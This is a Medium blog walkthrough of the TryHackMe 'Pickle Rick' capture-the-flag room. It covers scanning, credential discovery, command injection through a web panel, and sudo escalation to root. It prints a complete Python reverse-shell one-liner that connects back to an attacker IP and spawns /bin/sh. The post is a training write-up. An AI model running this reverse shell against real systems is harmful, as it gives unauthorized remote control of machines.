Open in app

Sign in

Write

Sign in

Pickle Rick CTF TryHackMe Complete Walkthrough

Neelesh Patel
4 min readJul 23, 2021

--

A Rick and Morty CTF. Help turn Rick back into a human!

Let’s start with old school reconnaissance, the results are:

I have used -sV to Probe open ports to determine service/version info, -sC equivalent to — script=default and -oN to output my scan in normal, where I can see the ssh port is open along with the http Apache with port number 80 along with that I fired up my gobuster so I can see any hidden directories so where I found the following result login.php along with robots.txt, then i hop over to http://your_ip/login.php

looks like it is a username and password portal so we need both the credentials, Then I saw the source code of the page

where I found that the username is mentioned at the last and as per my gobuster results I saw the strange text from the robots.txt http://your_ip/robots.txt as shown

since I have the username and this anonymous text (looks like a week password ;-) ) when i enter both the credentials i was able to login.

looks like a command panel so I tried different commands so that I can see what’s inside this where I can see there are different type of files like clue.txt, index.html, login.php, portal.php, robots.txt etc. available and tried to get all files it shows it the command denied ;-(

then I saw this allowed us to inject some python commands in it for example I typed print hello3 it was executed so I created the python reverse shell onto my kali machine with nc listening on it so that I can see what’s behind the scenes :-0. I tried with python 2 but the page was not accepting so I tried it python 3 that is good to go.

so I created a reverse shell using python

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“your_ip”, your_listeningport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

I used -l for listen mode, for inbound connects and -n numeric-only IP addresses, no DNS resolution, -v for verbose and -p for required port to be listened.

Looks like there are different types of files

I thought why not check all the sudo permissions ;-)

as there is no password so I hop over to list the root directory where I can see this third text as shown

Cat all the files, will let you answer all the required questions on TryHackMe.That’s all for now — — —

Until next time,

Stay COOOL!,

This is Neelesh Patel aka cyberbreath signing off!!

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Tryhackme
Tryhackme Writeup
Ctf
Ctf Writeup
Hacking

--

--

Neelesh Patel
Neelesh Patel

Written by Neelesh Patel

61 Followers
17 Following

All I need is just my ten fingers and sometimes {coffee}, to talk to computers.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams